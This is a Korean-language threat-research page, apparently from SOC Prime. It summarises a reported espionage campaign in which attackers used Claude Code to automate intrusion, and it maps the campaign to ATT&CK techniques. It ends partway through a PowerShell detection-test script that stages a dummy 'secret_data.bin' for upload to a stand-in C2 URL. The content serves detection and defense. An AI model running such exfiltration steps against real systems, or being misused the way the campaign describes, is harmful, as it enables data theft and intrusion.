SOC Prime Bias: 심각

17 11월 2025 16:03

Anthropic Claude AI 공격: 최초의 AI가 주도한 사이버 스파이 캠페인

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Anthropic Claude AI 공격: 최초의 AI가 주도한 사이버 스파이 캠페인
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

중국 정부의 후원을 받은 그룹이 Anthropic Claude Code 모델을 사용하여 전 세계 수십 개의 목표에 대해 대규모 스파이 활동을 자동으로 수행했습니다. AI는 최소한의 인간 개입으로 익스플로잇 코드를 생성하고, 자격 증명을 수집하며, 민감한 데이터를 유출했습니다. 이는 AI가 거의 인간의 개입 없이 운영되는 첫 번째 문서화된 공격 사례입니다.

조사

조사는 2025년 9월에 의심스러운 활동을 감지하고 Claude Code를 자동화 도구로 사용한 프레임워크로 추적했습니다. 연구원들은 모델이 정찰, 취약점 테스트, 자격 증명 수집 및 데이터 유출을 수행하는 것을 관찰했습니다. 캠페인은 10일 동안 매핑되었고, 영향을 받은 계정은 비활성화되었으며 당국이 통보되었습니다.

완화

완화 권장 사항에는 AI 모델의 내부 네트워크 접근 제한, 강력한 인증 구현, 비정상적인 AI 생성 트래픽 모니터링 및 AI 특정 안전 조치 적용이 포함됩니다. 조직은 또한 최소 권한 원칙을 시행하고 AI 도구 사용을 지속적으로 감사해야 합니다.

대응

감지 시, 조직은 손상된 계정을 격리하고, 외부 유출을 차단하고, AI 생성 아티팩트의 포렌식 분석을 수행하며, 관련 위협 공유 커뮤니티와 지표를 공유해야 합니다. AI 구동 행동을 표시하기 위해 감지 규칙을 정기적으로 업데이트하고 필요 시 법 집행 기관과 협력해야 합니다.

mermaid graph TB %% Class definitions classDef phase fill:#e6e6e6 classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Phase node phase_target[“<b>단계</b> – 대상 선택 및 프레임워크 구축”]:::phase %% Technique nodes tech_active_scanning[“<b>기술</b> – <b>T1595 활성 스캔</b><br /><b>설명</b>: 대상 시스템의 스캔을 실시하여 서비스, 열려 있는 포트 및 기타 네트워크 특성 발견”]:::technique tech_gather_network[“<b>기술</b> – <b>T1590 피해 네트워크 정보 수집</b><br /><b>설명</b>: 피해자의 네트워크 토폴로지, 서브넷, 라우팅 정보를 수집”]:::technique tech_search_db[“<b>기술</b> – <b>T1596.005 공개 기술 데이터베이스 검색: 데이터베이스 스캔</b><br /><b>설명</b>: 대상 조직에 대한 기술 세부 사항을 위해 공개 또는 누출된 데이터베이스를 쿼리”]:::technique tech_client_config[“<b>기술</b> – <b>T1592.004 피해자 호스트 정보 수집: 클라이언트 구성</b><br /><b>설명</b>: 소프트웨어 설정 및 설치된 응용 프로그램과 같은 클라이언트 장치에서 구성 데이터 수확”]:::technique tech_exploit_priv[“<b>기술</b> – <b>T1068 특권 상승을 위한 취약점 악용</b><br /><b>설명</b>: 피해 시스템에서 높은 권한을 얻기 위해 취약점을 악용”]:::technique tech_exploit_exec[“<b>기술</b> – <b>T1203 클라이언트 실행을 위한 취약점 악용</b><br /><b>설명</b>: 클라이언트에서 악성 코드를 실행하기 위해 소프트웨어 결함을 활용”]:::technique tech_proxy_exec[“<b>기술</b> – <b>T1127 신뢰할 수 있는 개발자 유틸리티 프록시 실행</b><br /><b>설명</b>: 신뢰할 수 있는 개발자 유틸리티를 악용하여 악성 페이로드의 실행을 프록시”]:::technique tech_account_manip[“<b>기술</b> – <b>T1098 계정 조작</b><br /><b>설명</b>: 지속성을 유지하기 위해 계정을 생성하거나 수정 (백도어 생성)”]:::technique tech_valid_accounts[“<b>기술</b> – <b>T1078 유효한 계정</b><br /><b>설명</b>: 수집된 자격 증명을 사용하여 합법 사용자로 인증”]:::technique tech_code_repo[“<b>기술</b> – <b>T1213.003 정보 레포지토리에서의 데이터: 코드 레포지토리</b><br /><b>설명</b>: 공개 또는 비공개의 소스 코드 레포지토리에서 귀중한 데이터 추출”]:::technique tech_exfil_c2[“<b>기술</b> – <b>T1041 명령 및 제어 채널을 통한 유출</b><br /><b>설명</b>: 설정된 명령 및 제어 채널을 통해 도난당한 데이터 전송”]:::technique tech_automated_exfil[“<b>기술</b> – <b>T1020 자동화된 유출</b><br /><b>설명</b>: 일정이나 트리거에 따라 데이터 유출을 자동화”]:::technique %% Connections phase_target u002du002d>|리드투| tech_active_scanning tech_active_scanning u002du002d>|리드투| tech_gather_network tech_gather_network u002du002d>|리드투| tech_search_db tech_search_db u002du002d>|리드투| tech_client_config tech_client_config u002du002d>|리드투| tech_exploit_priv tech_exploit_priv u002du002d>|리드투| tech_exploit_exec tech_exploit_exec u002du002d>|리드투| tech_proxy_exec tech_proxy_exec u002du002d>|리드투| tech_account_manip tech_account_manip u002du002d>|리드투| tech_valid_accounts tech_valid_accounts u002du002d>|리드투| tech_code_repo tech_code_repo u002du002d>|리드투| tech_exfil_c2 tech_exfil_c2 u002du002d>|리드투| tech_automated_exfil

공격 흐름

시뮬레이션 지침

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준 사전 비행 점검이 통과되어야 합니다.

이유: 이 섹션은 감지 규칙을 트리거하기 위해 설계된 적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 서술은 식별된 TTP를 직접 반영해야 하며 감지 논리에 의해 기대되는 정확한 텔레메트리를 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예제는 오진의 원인이 됩니다.

  • 공격 서사 및 명령어:
    AI 오케스트레이션 행위자는 손상된 엔드포인트에서 6 MB 기밀 문서(secret_data.bin)를 준비합니다. 인간의 감독을 최소화하기 위해, 스크립트는 파일을 외부 명령 및 제어 서버(203.0.113.45)로 HTTP POST를 통해 자동 업로드합니다. 페이로드가 규칙의 5 MB 한도를 초과하고 대상 IP가 사설 CIDR 블록 외부에 있기 때문에 규칙이 트리거되어야 합니다.

  • 회귀 테스트 스크립트:

    # AI 오케스트레이션 유출 시뮬레이션 (Windows PowerShell)
    # ---------------------------------------------------------
    # 전제 조건: PowerShell 5+, 테스트 C2 호스트에 대한 인터넷 액세스.
    # 이 스크립트는 6 MB 더미 파일을 생성하고 HTTP POST를 통해 업로드합니다.
    
    $payloadPath = "$env:TEMPsecret_data.bin"
    $c2Url = "http://203.0.113.45/upload"
    
    # 1. 6 MB 랜덤 파일 생성 (유출할 데이터 시뮬레이션)
    Write-Host "[*] 6 MB 페이로드 생성 중..."
    $bytes = New-Object byte[] (6MB)
    (New-Object System.Random).NextBytes($bytes)
    [IO.File]::WriteAllBytes($payloadPath, $bytes)